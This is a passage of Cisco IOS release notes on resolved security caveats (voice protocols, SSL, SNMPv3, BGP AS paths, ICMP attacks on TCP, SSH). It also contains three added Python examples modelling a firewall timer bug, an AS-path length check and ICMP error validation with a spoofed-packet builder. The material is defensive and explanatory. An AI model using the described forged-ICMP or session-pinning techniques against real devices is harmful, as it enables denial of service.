Note: Another related advisory has been posted with this advisory. This additional advisory also describes a vulnerability related to cryptography that affects Cisco IOS. This related advisory is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-crypto.shtml

A combined software table for Cisco IOS is available to aid customers in choosing a software release that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.

CSCeb21064

Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:

Session Initiation Protocol (SIP)

Media Gateway Control Protocol (MGCP)

Signaling protocols H.323, H.245

Real-time Transport Protocol (RTP)

Facsimile reception

Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.

There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml

CSCsc60249

Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:

Session Initiation Protocol (SIP)

Media Gateway Control Protocol (MGCP)

Signaling protocols H.323, H.245

Real-time Transport Protocol (RTP)

Facsimile reception

Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.

There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml

CSCsc72722

Symptoms: TCP connections that are opened through a Cisco IOS Firewall (CBAC) may not timeout.

Conditions: With Cisco IOS Firewall (CBAC) enabled, the TCP idle timer for a session may be reset even by TCP packets that fail TCP inspection and are subsequently dropped. This could lead to the TCP session not timing out.

Workaround: There is no workaround.
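To make the timer behaviour concrete, the following Python is an added example, not Cisco IOS code, of a minimal stateful TCP inspection table. With refresh_on_pass_only=False it reproduces the caveat: the idle timer is touched before the verdict, so a stream of out-of-window junk that is dropped keeps the session alive indefinitely. With the flag set, the timer moves only when a segment passes inspection and the session expires as it should. The session key, the window model and the timeline are constructed for the example; real CBAC tracks far more state than this.

```python
"""Stateful TCP inspection whose idle timer moves only for segments that pass inspection."""
from dataclasses import dataclass

MASK32 = 0xFFFFFFFF

def seq_in_window(lo, x, hi):
    """lo <= x < hi in 32-bit sequence-number space."""
    return ((x - lo) & MASK32) < ((hi - lo) & MASK32)

@dataclass
class Session:
    rcv_nxt: int              # next sequence number expected from the initiator
    rcv_wnd: int = 65535      # assumed receive window for the demo
    last_seen: float = 0.0    # time of the last segment that refreshed the idle timer

class TcpInspector:
    """Tiny CBAC-like session table; refresh_on_pass_only=False reproduces the caveat."""

    def __init__(self, idle_timeout=30.0, refresh_on_pass_only=True):
        self.idle_timeout = idle_timeout
        self.refresh_on_pass_only = refresh_on_pass_only
        self.sessions = {}

    def open_session(self, key, isn, now):
        self.sessions[key] = Session(rcv_nxt=(isn + 1) & MASK32, last_seen=now)

    def expire(self, now):
        """Remove sessions idle longer than the timeout; returns the keys removed."""
        dead = [k for k, s in self.sessions.items() if now - s.last_seen > self.idle_timeout]
        for k in dead:
            del self.sessions[k]
        return dead

    def inspect(self, key, seq, payload_len, now):
        """Verdict for one inbound segment on the session identified by key."""
        self.expire(now)
        s = self.sessions.get(key)
        if s is None:
            return "drop: no session"
        if not self.refresh_on_pass_only:
            s.last_seen = now          # the bug: the timer is touched before the verdict
        if not seq_in_window(s.rcv_nxt, seq, (s.rcv_nxt + s.rcv_wnd) & MASK32):
            return "drop: out of window"
        s.rcv_nxt = (seq + payload_len) & MASK32   # in-order delivery assumed for the demo
        s.last_seen = now              # only an accepted segment keeps the session alive
        return "pass"

def simulate(refresh_on_pass_only):
    """Constructed timeline: one legitimate segment at t=5, then out-of-window junk every 10 s."""
    fw = TcpInspector(idle_timeout=30.0, refresh_on_pass_only=refresh_on_pass_only)
    key = ("203.0.113.7", 51000, "192.0.2.80", 80)
    fw.open_session(key, isn=1000, now=0.0)
    verdicts = [fw.inspect(key, seq=1001, payload_len=100, now=5.0)]
    for t in range(10, 70, 10):
        verdicts.append(fw.inspect(key, seq=999_999, payload_len=40, now=float(t)))
    return {"verdicts": verdicts, "alive": key in fw.sessions}

if __name__ == "__main__":
    for mode in (False, True):
        print("refresh_on_pass_only=%s -> %s" % (mode, simulate(mode)))
```

The security consequence of the buggy ordering is that anyone who knows the 4-tuple can pin a session open with garbage, which defeats the idle timeout as a resource-exhaustion control and keeps a hole in the firewall for a spoofed or hijacked connection.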

CSCsd81407

Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:

Session Initiation Protocol (SIP)

Media Gateway Control Protocol (MGCP)

Signaling protocols H.323, H.245

Real-time Transport Protocol (RTP)

Facsimile reception

Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.

There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml

CSCsd92405

A Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. To trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.

Successful repeated exploitation of any of these vulnerabilities may lead to a sustained denial of service (DoS); however, the vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device. These vulnerabilities are not believed to allow an attacker to decrypt any previously encrypted information.

Cisco IOS is affected by the following vulnerabilities:

Processing ClientHello messages, documented as Cisco bug ID CSCsb12598

Processing ChangeCipherSpec messages, documented as Cisco bug ID CSCsb40304

Processing Finished messages, documented as Cisco bug ID CSCsd92405

Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml.

Note: Another related advisory has been posted with this advisory. This additional advisory also describes a vulnerability related to cryptography that affects Cisco IOS. This related advisory is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-crypto.shtml

A combined software table for Cisco IOS is available to aid customers in choosing a software release that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.

CSCsd95616

Two crafted Protocol Independent Multicast (PIM) packet vulnerabilities exist in Cisco IOS software that may lead to a denial of service (DoS) condition. Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities are available.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml.

CSCse68138

Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:

Session Initiation Protocol (SIP)

Media Gateway Control Protocol (MGCP)

Signaling protocols H.323, H.245

Real-time Transport Protocol (RTP)

Facsimile reception

Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.

There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml

CSCsf04754

Multiple Cisco products contain either of two authentication vulnerabilities in the Simple Network Management Protocol version 3 (SNMPv3) feature. These vulnerabilities can be exploited when processing a malformed SNMPv3 message. These vulnerabilities could allow the disclosure of network information or may enable an attacker to perform configuration changes to vulnerable devices. The SNMP server is an optional service that is disabled by default. Only SNMPv3 is impacted by these vulnerabilities. Workarounds are available for mitigating the impact of the vulnerabilities described in this document.

The United States Computer Emergency Response Team (US-CERT) has assigned Vulnerability Note VU#878044 to these vulnerabilities.

Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-0960 has been assigned to these vulnerabilities.

This advisory will be posted at http://www.cisco.com/warp/public/707/cisco-sa-20080610-snmpv3.shtml

CSCsg16908

Multiple vulnerabilities exist in the Cisco IOS File Transfer Protocol (FTP) Server feature. These vulnerabilities include Denial of Service, improper verification of user credentials and the ability to read or write any file in the device's filesystem, including the device's saved configuration, which may include passwords or other sensitive information.

The IOS FTP Server is an optional service that is disabled by default. Devices that are not specifically configured to enable the IOS FTP Server service are unaffected by these vulnerabilities.

These vulnerabilities do not apply to the IOS FTP Client feature.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070509-iosftp.shtml.

CSCsg40567

Symptoms: Malformed SSL packets may cause a router to leak multiple memory blocks.

Conditions: This symptom is observed on a Cisco router on which the ip http secure-server command is enabled.

Workaround: Disable the HTTPS server with the no ip http secure-server command.

CSCsg70474

Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:

Session Initiation Protocol (SIP)

Media Gateway Control Protocol (MGCP)

Signaling protocols H.323, H.245

Real-time Transport Protocol (RTP)

Facsimile reception

Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section of the advisory contains fixes for all vulnerabilities mentioned in the advisory.

There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml

CSCsi60004

Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:

Session Initiation Protocol (SIP)

Media Gateway Control Protocol (MGCP)

Signaling protocols H.323, H.245

Real-time Transport Protocol (RTP)

Facsimile reception

Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section of the advisory contains fixes for all vulnerabilities mentioned in the advisory.

There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml

TCP/IP Host-Mode Services

CSCek37177

The Cisco IOS Transmission Control Protocol (TCP) listener in certain versions of Cisco IOS software is vulnerable to a remotely-exploitable memory leak that may lead to a denial of service condition.

This vulnerability only applies to traffic destined to the Cisco IOS device. Traffic transiting the Cisco IOS device will not trigger this vulnerability.

Cisco has made free software available to address this vulnerability for affected customers.

This issue is documented as Cisco bug ID CSCek37177.

There are workarounds available to mitigate the effects of the vulnerability.

This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-tcp.shtml

CSCse05736

Symptoms: A router that is running RCP can be reloaded by a specific packet.

Conditions: This symptom is seen under the following conditions:

The router must have RCP enabled.

The packet must come from the source address of the designated system configured to send RCP packets to the router.

The packet must have a specific data content.

Workaround: Apply access lists at the edge of your network that block RCP traffic (RCP runs over rsh, TCP port 514) so that spoofed rsh packets cannot reach the router. Alternatively, use another protocol such as SCP instead of RCP, and apply VTY access lists.

Resolved Caveats—Cisco IOS Release 12.2(26b)

Cisco IOS Release 12.2(26b) is a rebuild release for Cisco IOS Release 12.2(26). The caveats in this section are resolved in Cisco IOS Release 12.2(26b) but may be open in previous Cisco IOS releases.

The following information is provided for each caveat:

Symptoms: A description of what is observed when the caveat occurs.

Conditions: The conditions under which the caveat has been known to occur.

Workaround: Solutions, if available, to counteract the caveat.

IP Routing Protocols

CSCeh13489

Symptoms: A router may reset its Border Gateway Protocol (BGP) session.

Conditions: This symptom is observed when a Cisco router that peers with other routers receives an Autonomous System (AS) path with a length that is equal to or greater than 255.

Workaround: Configure the bgp maxas-limit command in such a way that the maximum accepted AS path length is a value below 255. When the router receives an update whose AS path exceeds the configured limit, the prefix is rejected and the event is recorded in the log.
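The following Python is an added example, not Cisco code and not part of this release note. It models the AS_PATH attribute encoding and the kind of length check that bgp maxas-limit performs on it. Each AS_PATH segment carries its AS count in a single byte, so one segment can hold at most 255 entries, but an attribute may chain several segments, so the total number of ASes in a path can exceed what an 8-bit counter holds. The sample paths are constructed; counting every AS entry once (rather than weighting AS_SET segments differently) is an assumption of this model.

```python
import struct

# AS_PATH segment types (RFC 4271 / RFC 5065).
AS_SET = 1
AS_SEQUENCE = 2
AS_CONFED_SEQUENCE = 3
AS_CONFED_SET = 4
KNOWN_SEGMENT_TYPES = {AS_SET, AS_SEQUENCE, AS_CONFED_SEQUENCE, AS_CONFED_SET}


def build_as_path(segments, as4=False):
    """Encode [(segment_type, [asn, ...]), ...] as an AS_PATH attribute value.

    Each segment is a one-byte type, a one-byte AS count, then the ASes as
    2-byte (or 4-byte when as4=True) values. One segment holds at most 255
    ASes, but nothing limits how many segments an attribute may carry.
    """
    fmt = ">I" if as4 else ">H"
    out = bytearray()
    for seg_type, asns in segments:
        if not 1 <= len(asns) <= 255:
            raise ValueError("segment AS count must be 1..255")
        out += bytes([seg_type, len(asns)])
        for asn in asns:
            out += struct.pack(fmt, asn)
    return bytes(out)


def parse_as_path(attr, as4=False):
    """Decode an AS_PATH attribute value into [(segment_type, [asn, ...]), ...].

    Raises ValueError on a truncated, unknown or zero-length segment instead of
    trusting the peer-supplied length fields.
    """
    size = 4 if as4 else 2
    fmt = ">I" if as4 else ">H"
    segments = []
    pos = 0
    while pos < len(attr):
        if pos + 2 > len(attr):
            raise ValueError("truncated segment header")
        seg_type, count = attr[pos], attr[pos + 1]
        if seg_type not in KNOWN_SEGMENT_TYPES:
            raise ValueError("unknown segment type %d" % seg_type)
        if count == 0:
            raise ValueError("zero-length segment")
        pos += 2
        end = pos + count * size
        if end > len(attr):
            raise ValueError("truncated segment body")
        asns = [struct.unpack(fmt, attr[i:i + size])[0] for i in range(pos, end, size)]
        segments.append((seg_type, asns))
        pos = end
    return segments


def check_maxas_limit(attr, limit, as4=False):
    """Emulate the check behind 'bgp maxas-limit <limit>'.

    Returns (accepted, total_as_count). The total is the number of AS entries
    across all segments, held in a Python int, so it cannot wrap the way an
    8-bit counter does once a path reaches 255 entries. Assumption: every
    entry counts once, including entries inside AS_SET segments.
    """
    total = sum(len(asns) for _, asns in parse_as_path(attr, as4))
    return total <= limit, total


def demo():
    """Constructed paths: a normal one, and one long enough to hit the caveat."""
    normal = build_as_path([(AS_SEQUENCE, [65001, 65002, 65003])])
    # Two AS_SEQUENCE segments of 200 and 100 entries: 300 ASes in one attribute,
    # even though no single segment's count byte can exceed 255.
    long_path = build_as_path([(AS_SEQUENCE, [65000] * 200),
                               (AS_SEQUENCE, [65100] * 100)])
    return check_maxas_limit(normal, 254), check_maxas_limit(long_path, 254)


if __name__ == "__main__":
    for accepted, total in demo():
        print("path with %d ASes: %s" % (total, "accepted" if accepted else "rejected"))
```

With a limit of 254 the 300-entry path is rejected before it reaches the best-path code, which is the effect the workaround relies on; a path of exactly 255 entries fits in one segment and would also be rejected at that limit.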

Miscellaneous

CSCei61732

Cisco IOS may permit arbitrary code execution after exploitation of a heap-based buffer overflow vulnerability. Cisco has included additional integrity checks in its software, as further described below, that are intended to reduce the likelihood of arbitrary code execution.

Cisco has made free software available that includes the additional integrity checks for affected customers.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20051102-timers.shtml.

Resolved Caveats—Cisco IOS Release 12.2(26a)

Cisco IOS Release 12.2(26a) is a rebuild release for Cisco IOS Release 12.2(26). The caveats in this section are resolved in Cisco IOS Release 12.2(26a) but may be open in previous Cisco IOS releases.

The following information is provided for each caveat:

Symptoms: A description of what is observed when the caveat occurs.

Conditions: The conditions under which the caveat has been known to occur.

Workaround: Solutions, if available, to counteract the caveat.

Basic System Services

CSCef46191

Symptoms: A specifically crafted Transmission Control Protocol (TCP) connection to a telnet or reverse telnet port of a Cisco device running Internetwork Operating System (IOS) may block further telnet, reverse telnet, Remote Shell (RSH), Secure Shell (SSH), and in some cases Hypertext Transport Protocol (HTTP) access to the Cisco device. Telnet, reverse telnet, RSH and SSH sessions established prior to exploitation are not affected.

All other device services will operate normally.

Conditions: A user-initiated, specially crafted TCP connection to a telnet or reverse telnet port blocks further telnet sessions. Services such as packet forwarding, routing protocols, and all other communication to and through the device remain unaffected.

Workaround: See the detailed advisory at http://www.cisco.com/warp/public/707/cisco-sa-20040827-telnet.shtml

IP Routing Protocols

CSCef60659

A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).

These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:

1. Attacks that use ICMP "hard" error messages
2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks
3. Attacks that use ICMP "source quench" messages

Successful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.

Multiple Cisco products are affected by the attacks described in this Internet draft.

Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml.

The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en.

CSCsa59600

A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).

These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:

1. Attacks that use ICMP "hard" error messages
2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks
3. Attacks that use ICMP "source quench" messages

Successful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.

Multiple Cisco products are affected by the attacks described in this Internet draft.

Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml.

The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en.

Miscellaneous

CSCea87364

Symptoms: Distributed Cisco Express Forwarding (DCEF) may become disabled on a Versatile Interface Processor (VIP) or Cisco 12000 series line card (LC), and the following error message may appear on the console:

%FIB-3-FIBDISABLE: Fatal error, slot 12: Window did not open, LC to RP IPC is non-operational

Conditions: This symptom is observed on a Cisco 7500 series VIP2-50 and VIP4-80 in which ATM OC-3 port adapters such as the PA-A1-OC3 or PA-A3-OC3 are installed when the Cisco 7500 series is upgraded to Cisco IOS Release 12.0(24)S or Release 12.0(24)S1. This symptom is also observed on a Cisco 12000 series LC during significant, prolonged routing table churn.

Workaround: Reload CEF on the VIP or LC by entering the clear cef linecard slot-number EXEC command.

Alternate Workaround: Restart the VIP by performing an online insertion and removal (OIR). Restart the LC by entering the hw-module slot slot-number reload command.

CSCee22810

Symptoms: On a Cisco 7500 series, all PVCs may suddenly enter the down state and remain in this state for about two minutes before they come back up. During the DLCI down state, the subinterface does not go down and no notifications are observed in the message log.

Conditions: This symptom is observed on a Cisco 7500 series that is configured with an RSP4+ or an RSP8 and that runs the rsp-jsv-mz image of Cisco IOS Release 12.2(12i). In addition, the router is configured with an 8-port serial port adapter and an HSSI port adapter, is configured for Frame Relay, and has more than 450 PVCs/DLCIs. Note that the symptom may be platform-independent and may also occur on other Cisco platforms in a similar configuration.

Note: This is a timing issue and is not dependent on the number of VCs.

Workaround: There is no workaround.

CSCee80885

Symptoms: A Cisco voice gateway may reload with a bus error at an invalid address:

System was restarted by bus error at PC 0x60C5BD30, address 0xD391832C

Conditions: This symptom is observed on a Cisco voice gateway that is running Cisco IOS Release 12.2(23b) and H.323.

Workaround: There is no workaround.

CSCef44225

A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).

These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:

1. Attacks that use ICMP "hard" error messages
2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks
3. Attacks that use ICMP "source quench" messages

Successful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.

Multiple Cisco products are affected by the attacks described in this Internet draft.

Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml.

The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en.

CSCef44699

A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).

These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:

1. Attacks that use ICMP "hard" error messages
2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks
3. Attacks that use ICMP "source quench" messages

Successful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.

Multiple Cisco products are affected by the attacks described in this Internet draft.

Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml

The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en

TCP/IP Host-Mode Services

CSCed78149

A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).

These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:

1. Attacks that use ICMP "hard" error messages
2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks
3. Attacks that use ICMP "source quench" messages

Successful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.

Multiple Cisco products are affected by the attacks described in this Internet draft.

Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml

The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en
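The five caveats above that reference the "ICMP Attacks Against TCP" draft (CSCef60659, CSCsa59600, CSCef44225, CSCef44699 and CSCed78149) all describe the same three attack classes. The following Python is an added example, not Cisco code and not part of this release note: it shows the validation a TCP stack can apply to an inbound ICMP error before acting on it, which is the counter-measure the draft proposes. An ICMP error quotes the IP header and first 8 bytes of the datagram that triggered it, so the receiver can require that the quoted 4-tuple match an existing connection and that the quoted sequence number fall inside the send window; an off-path attacker then has to guess a valid sequence number. Hard errors against established connections are treated as soft (no reset), source quench is ignored, and a next-hop MTU below a floor is ignored. The connection table, the ICMP messages and the MIN_PMTU floor of 576 are constructed for this example and are assumptions, not values from the advisory.

```python
import struct
from dataclasses import dataclass

ICMP_DEST_UNREACH = 3
ICMP_SOURCE_QUENCH = 4
CODE_PROTO_UNREACH = 2   # RFC 1122 "hard" errors: codes 2 and 3
CODE_PORT_UNREACH = 3
CODE_FRAG_NEEDED = 4     # PMTUD: the ICMP header carries a next-hop MTU
HARD_ERROR_CODES = {CODE_PROTO_UNREACH, CODE_PORT_UNREACH}
IPPROTO_TCP = 6
MIN_PMTU = 576           # assumption: floor below which an advertised MTU is ignored


@dataclass
class TcpConn:
    """Minimal state for one TCP connection terminating on this device."""
    local_ip: str
    local_port: int
    remote_ip: str
    remote_port: int
    snd_una: int   # oldest unacknowledged sequence number
    snd_nxt: int   # next sequence number to be sent
    pmtu: int = 1500


def seq_in_send_window(seq, snd_una, snd_nxt):
    """True if snd_una <= seq < snd_nxt, using modulo-2^32 arithmetic."""
    return ((seq - snd_una) & 0xFFFFFFFF) < ((snd_nxt - snd_una) & 0xFFFFFFFF)


def build_icmp_error(icmp_type, icmp_code, src_ip, dst_ip, sport, dport, seq, next_hop_mtu=0):
    """Constructed ICMP error: 8-byte ICMP header, quoted IPv4 header, first 8 TCP bytes.

    Checksums are left zero; they play no part in the validation shown here.
    """
    icmp_hdr = struct.pack(">BBHHH", icmp_type, icmp_code, 0, 0, next_hop_mtu)
    ip_hdr = struct.pack(">BBHHHBBH4s4s", 0x45, 0, 28, 0, 0, 64, IPPROTO_TCP, 0,
                         bytes(map(int, src_ip.split("."))),
                         bytes(map(int, dst_ip.split("."))))
    tcp8 = struct.pack(">HHI", sport, dport, seq)
    return icmp_hdr + ip_hdr + tcp8


def handle_icmp_error(icmp, conns):
    """Decide what the TCP stack should do with an inbound ICMP error.

    conns maps (local_ip, local_port, remote_ip, remote_port) -> TcpConn.
    Returns (action, conn); any action starting with 'ignore:' changes nothing.
    """
    if len(icmp) < 8 + 20 + 8:
        return "ignore:truncated", None
    icmp_type, icmp_code = icmp[0], icmp[1]
    next_hop_mtu = struct.unpack(">H", icmp[6:8])[0]
    inner = icmp[8:]
    ihl = (inner[0] & 0x0F) * 4
    if ihl < 20 or len(inner) < ihl + 8:
        return "ignore:truncated", None
    if inner[9] != IPPROTO_TCP:
        return "ignore:not-tcp", None
    # The quoted datagram is one this device sent, so its source is the local endpoint.
    src_ip = ".".join(map(str, inner[12:16]))
    dst_ip = ".".join(map(str, inner[16:20]))
    sport, dport, seq = struct.unpack(">HHI", inner[ihl:ihl + 8])
    conn = conns.get((src_ip, sport, dst_ip, dport))
    if conn is None:
        return "ignore:no-connection", None
    # An off-path attacker has to guess a sequence number inside the send window.
    if not seq_in_send_window(seq, conn.snd_una, conn.snd_nxt):
        return "ignore:seq-outside-window", conn
    if icmp_type == ICMP_SOURCE_QUENCH:
        return "ignore:source-quench", conn      # never throttle on source quench
    if icmp_type == ICMP_DEST_UNREACH and icmp_code == CODE_FRAG_NEEDED:
        if next_hop_mtu < MIN_PMTU:
            return "ignore:mtu-too-small", conn  # attacker-chosen tiny MTU
        if next_hop_mtu >= conn.pmtu:
            return "ignore:mtu-not-smaller", conn
        conn.pmtu = next_hop_mtu
        return "pmtu-update", conn
    if icmp_type == ICMP_DEST_UNREACH and icmp_code in HARD_ERROR_CODES:
        # Hard error against an established connection: record it, do not reset.
        return "soft-error", conn
    return "soft-error", conn


def make_conns():
    """One constructed connection: a BGP session from 10.0.0.1 to 192.0.2.10."""
    c = TcpConn("10.0.0.1", 40000, "192.0.2.10", 179, snd_una=1000, snd_nxt=1500)
    return {(c.local_ip, c.local_port, c.remote_ip, c.remote_port): c}


if __name__ == "__main__":
    conns = make_conns()
    spoofed = build_icmp_error(ICMP_DEST_UNREACH, CODE_PORT_UNREACH,
                               "10.0.0.1", "192.0.2.10", 40000, 179, seq=5000)
    print(handle_icmp_error(spoofed, conns)[0])
```

The sequence-number check is what turns a blind attack into a guessing game: with a 500-byte send window the attacker has roughly a 1 in 8.6 million chance per forged message, versus certainty when the stack accepts any ICMP error that names the right ports.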

Resolved Caveats—Cisco IOS Release 12.2(26)

This section describes possibly unexpected behavior by Cisco IOS Release 12.2(26). All the caveats listed in this section are resolved in Cisco IOS Release 12.2(26). This section describes severity 1 and 2 caveats and select severity 3 caveats.

The following information is provided for each caveat:

Symptoms: A description of what is observed when the caveat occurs.

Conditions: The conditions under which the caveat has been known to occur.

Workaround: Solutions, if available, to counteract the caveat.

Basic System Services

CSCed65285

Certain release trains of Cisco Internetwork Operating System (IOS), when configured to use the Cisco IOS Secure Shell (SSH) server in combination with Terminal Access Controller Access Control System Plus (TACACS+) as a means to perform remote management tasks on Cisco IOS devices, may contain two vulnerabilities that can potentially cause Cisco IOS devices to exhaust resources and reload. Repeated exploitation of these vulnerabilities can result in a Denial of Service (DoS) condition. Use of SSH with Remote Authentication Dial-In User Service (RADIUS) is not affected by these vulnerabilities.

Cisco has made free software available to address these vulnerabilities for all affected customers. There are workarounds available to mitigate the effects of the vulnerability (see the "Workarounds" section of the full advisory for details.)

This advisory will be posted at http://www.cisco.com/warp/public/707/cisco-sa-20050406-ssh.shtml

CSCed67358

Symptoms: An IPv6 PIM neighbor may be down after changing the PIM configuration.

